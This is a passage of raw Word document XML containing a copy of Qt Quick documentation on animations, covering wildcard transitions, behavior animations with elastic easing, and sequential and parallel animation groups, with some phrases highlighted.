        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>symmetric transitions</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, setting the to</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to</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property to the wild card symbol, "</w:t>
      </w:r>
      <w:r w:rsidRPr="00466618">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>", denotes that the transition applies to any state change.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transitions</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Transition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to</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ColorAnimation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target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button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duration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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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9C0F4C">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2107" w:name="default-animation-as-behaviors"/>
      <w:bookmarkStart w:id="2108" w:name="_Toc483000986"/>
      <w:bookmarkStart w:id="2109" w:name="_Toc483003977"/>
      <w:bookmarkStart w:id="2110" w:name="_Toc483604328"/>
      <w:bookmarkStart w:id="2111" w:name="_Toc483605548"/>
      <w:bookmarkEnd w:id="2107"/>
      <w:r w:rsidRPr="009C0F4C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Default Animation as Behaviors</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2108"/>
      <w:bookmarkEnd w:id="2109"/>
      <w:bookmarkEnd w:id="2110"/>
      <w:bookmarkEnd w:id="2111"/>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B" w:rsidP="0018577B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385816">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Default property animations are set using</w:t>
      </w:r>
      <w:r w:rsidRPr="00385816">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00385816">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>behavior animations</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Animations declared in</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2482" w:history="1">
        <w:r w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Behavior</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>types apply to the property and animates any property value changes. However, Behavior types have an</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD585A">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>enabled</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property to purposely enable or disable the behavior animations.</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A ball component might have a behavior animation assigned to its</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x</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</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y</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and</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color</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>properties. The behavior animation could be set up to simulate an elastic effect. In effect, this behavior animation would apply the elastic effect to the properties whenever the ball moves.</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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width</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75</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height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75</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radius</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width</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ball</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color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"salmon"</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Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on x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NumberAnimation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bouncebehavior</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easing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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                type</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Easing</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OutElastic</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amplitude</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period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0.5</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Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on y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animation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bouncebehavior</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Behavior</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ColorAnimation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target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ball</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duration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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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 xml:space="preserve">There are </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD585A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">several methods of </w:t>
      </w:r>
      <w:r w:rsidRPr="009C0F4C">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>assigning behavior animations to properties</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD585A">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Behavior on &lt;property&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>declaration is a convenient way of assigning a behavior animation onto a property.</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See the</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2483" w:history="1">
        <w:r w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Examples - Animation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for a demonstration of behavioral animations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B" w:rsidP="009C0F4C">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2112" w:name="playing-animations-in-parallel-or-in-seq"/>
      <w:bookmarkStart w:id="2113" w:name="_Toc483000987"/>
      <w:bookmarkStart w:id="2114" w:name="_Toc483003978"/>
      <w:bookmarkStart w:id="2115" w:name="_Toc483604329"/>
      <w:bookmarkStart w:id="2116" w:name="_Toc483605549"/>
      <w:bookmarkEnd w:id="2112"/>
      <w:r w:rsidRPr="009C0F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Playing Animations in Parallel or in Sequence</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2113"/>
      <w:bookmarkEnd w:id="2114"/>
      <w:bookmarkEnd w:id="2115"/>
      <w:bookmarkEnd w:id="2116"/>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Animations can run</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00601B99">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in parallel</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00601B99">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in sequence</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Parallel animations will play a group of animations at the same time while sequential animations play a group of animations in order: one after the other. Grouping animations in</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2484" w:history="1">
        <w:r w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SequentialAnimation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2485" w:history="1">
        <w:r w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParallelAnimation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will play the animations in sequence or in parallel.</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A banner component may have several icons or slogans to display, one after the other. The</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opacity</w:t>
      </w:r>
      <w:r w:rsidR="00601B99">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property could transform to</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1.0</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>denoting an opaque object. Using the</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2486" w:history="1">
        <w:r w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SequentialAnimation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type, the opacity animations will play after the preceding animation finishes. The</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2487" w:history="1">
        <w:r w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParallelAnimation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type will play the animations at the same time.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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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banner</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width</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150</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height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100</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border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color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"black"</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Column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anchors</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centerIn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parent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Text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code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text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"Code less."</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opacity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0.01</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Text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create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text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"Create more."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opacity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0.01</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Text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deploy</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text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"Deploy everywhere."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opacity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0.01</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MouseArea</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anchors</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fill</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parent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onPressed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playbanner</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start</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SequentialAnimation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playbanner</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running</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>false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NumberAnimation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target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code</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property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"opacity"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to</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duration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200</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NumberAnimation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target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create</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property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"opacity"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to</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duration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200</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NumberAnimation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target</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deploy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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"opacity"</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to</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1.0</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duration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200</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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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Once individual animations are placed into a</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2488" w:history="1">
        <w:r w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SequentialAnimation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2489" w:history="1">
        <w:r w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParallelAnimation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, they can </w:t>
      </w:r>
      <w:r w:rsidRPr="00601B99">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>no longer be started and stopped independently</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The sequential or parallel animation must be started and stopped as a group.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="00601B99" w:rsidRDefault="0018577B" w:rsidP="0018577B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="00601B99">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2490" w:history="1">
        <w:r w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SequentialAnimation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00601B99">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type is also useful for playing</w:t>
      </w:r>
      <w:r w:rsidR="00601B99">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2491" w:anchor="qml-transition-animations" w:history="1">
